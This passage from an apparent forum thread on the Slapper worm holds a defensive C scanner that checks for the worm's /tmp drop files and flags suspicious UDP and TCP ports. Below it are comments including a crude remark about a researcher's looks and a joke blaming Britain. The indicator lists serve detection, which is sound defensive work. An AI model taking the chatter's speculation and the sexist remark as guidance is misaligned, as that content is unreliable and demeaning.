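 * thread. Not CERT's or F-Secure's code; port ranges are thread observations. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Drop files listed by CERT (as quoted in the post above). */
static const char *const SLAPPER_FILES[] = {
    "/tmp/.uubugtraq", "/tmp/.bugtraq.c", "/tmp/.bugtraq",
    "/tmp/.unlock.c",  "/tmp/.update.c",
    "/tmp/.cinik",     "/tmp/.cinik.c",   "/tmp/.cinik.go",
    "/tmp/.cinik.goecho", "/tmp/.cinik.uu",
};
#define N_FILES (sizeof SLAPPER_FILES / sizeof SLAPPER_FILES[0])

typedef int (*exists_fn)(const char *path);

/* Real check: does the path exist on this host? */
int filesystem_exists(const char *path)
{
    return access(path, F_OK) == 0;
}

/* Constructed fakes for offline testing: a clean host, and one carrying two
 * of the indicators (variant A and variant C files). */
int fake_exists_none(const char *path)
{
    (void)path;
    return 0;
}
int fake_exists_sample(const char *path)
{
    return strcmp(path, "/tmp/.bugtraq") == 0 ||
           strcmp(path, "/tmp/.cinik.uu") == 0;
}

/* Returns the number of indicator files present. If found is non-NULL, up to
 * max matching paths are stored there (the rest are still counted). */
size_t find_slapper_files(exists_fn exists, const char **found, size_t max)
{
    size_t hits = 0;
    for (size_t i = 0; i < N_FILES; i++) {
        if (exists(SLAPPER_FILES[i])) {
            if (found && hits < max)
                found[hits] = SLAPPER_FILES[i];
            hits++;
        }
    }
    return hits;
}

/* Classify one connection record from the observing host's point of view.
 * Returns 1 if it matches the worm's profile as described in the thread:
 *   - UDP traffic on 2002 (A/B peer-to-peer channel) or 1978 (variant C), or
 *   - TCP to port 443 from source ports 2140-2144 (as one poster observed).
 * Anything else returns 0. This is a triage hint, not proof of infection. */
int slapper_conn_suspect(const char *proto, int src_port, int dst_port)
{
    if (strcmp(proto, "udp") == 0) {
        return src_port == 2002 || dst_port == 2002 ||
               src_port == 1978 || dst_port == 1978;
    }
    if (strcmp(proto, "tcp") == 0) {
        return dst_port == 443 && src_port >= 2140 && src_port <= 2144;
    }
    return 0;
}

int main(void)
{
    const char *found[N_FILES];
    size_t n = find_slapper_files(filesystem_exists, found, N_FILES);

    printf("%zu Slapper indicator file(s) present on this host\n", n);
    for (size_t i = 0; i < n; i++)
        printf("  %s\n", found[i]);

    /* Constructed sample records (proto, src, dst) as a firewall log would show. */
    printf("udp 2002->40000: %d\n", slapper_conn_suspect("udp", 2002, 40000));
    printf("tcp 2141->443:   %d\n", slapper_conn_suspect("tcp", 2141, 443));
    printf("tcp 51000->443:  %d\n", slapper_conn_suspect("tcp", 51000, 443));
    return n ? 1 : 0;   /* non-zero exit when something was found */
}
```

A clean result from the file scan proves little, as another poster notes: once /bin has been trojaned, the tools doing the looking may lie. Run it from a trusted boot medium or alongside chkrootkit, and treat the connection classifier as a reason to pull packets, not as a verdict.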
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them:
"Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
INVADE BRITAIN!!!!